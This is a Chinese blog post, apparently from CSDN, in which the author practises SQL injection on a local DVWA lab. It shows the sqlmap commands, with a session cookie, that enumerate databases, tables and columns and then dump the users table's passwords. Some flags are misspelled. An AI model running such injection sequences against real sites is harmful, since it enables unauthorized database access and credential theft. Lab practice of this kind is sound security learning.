SQLmap注入学习实战 —— dvwa 从low到impossble

大晚上失眠了于是来写博客

你为啥这么勤奋

白天玩了手动注入,结果发现sql注入的难度给我自动设置成impossible了。每次都要改包,可能这是dvwa在win下的bug吧,虽说不致命,却有些许麻烦。

low级别注入 经过试验发现,medium和high其实都可以这么玩 你SQLMAP真强大

爆破库名

由于DVWA的注入是 GET类型的 详细参照前面一篇笔记。 所以我们这边要还要提交 cookie的值。 通过burpsuite截取包裹,我们发现我们包裹的cookie是

--cookie="security=impossible; security=low; Phpstorm-1c732ebb=8670e59f-a605-41f8-ad48-cfe0c5467ac0;PHPSESSID=ejq8q5fgjdcshgej49de1q2557"
这就是我说的不太对的地方了,明明设置成了low,可是cookie里面居然还提交了impossible,还有这个phpstrom是啥东西。。。我phpstorm开都没有开啊。
所以这正常的应该是这样子的。
--cooke="security=low; PHPSESSID=ejq8q5fgjdcshgej49de1q2557"

好了,然后我们打开sqlmap 输入

sqlmap -u "http://localhost/DVWA/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie="security=low; PHPSESSID=ejq8q5fgjdcshgej49de1q2557" --dbs 

不是很推荐用默认YES的选项,可能会错过一些很关键的操作,但是比较懒的话,还是加上 –batch吧

available databases [5]:
[*] dvwa
[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
爆破表

倒完之后呢,接下来进入 爆破表

输入代码
记住 -D 与 –tables 使用 tables不是列表的意思么。

sqlmap -u "http://localhost/DVWA/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie="security=low; PHPSESSID=ejq8q5fgjdcshgej49de1q2557" -D dvwa --tables
爆破列

爆破列
记住 -T 和 –colunms 结合使用 colunms不就是列么?

sqlmap -u "http://localhost/DVWA/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie="security=low; PHPSESSID=ejq8q5fgjdcshgej49de1q2557" -D dvwa -T users --colunms
爆破字段

爆破字段
记住 -C 和 –dump 结合使用 dump就是倾倒的意思嘛~~

sqlmap -u "http://localhost/DVWA/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie="security=low; PHPSESSID=ejq8q5fgjdcshgej49de1q2557" -D dvwa -T users -C password,users --dump

然后就找到密码了。
一般都是这个流程。
写篇博文过一下知识点,这些流程网上其实都找得到的。

2018年1月10日04:54:57
烧包
哇,再过一个小时就可以去晨跑了

  • 2
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值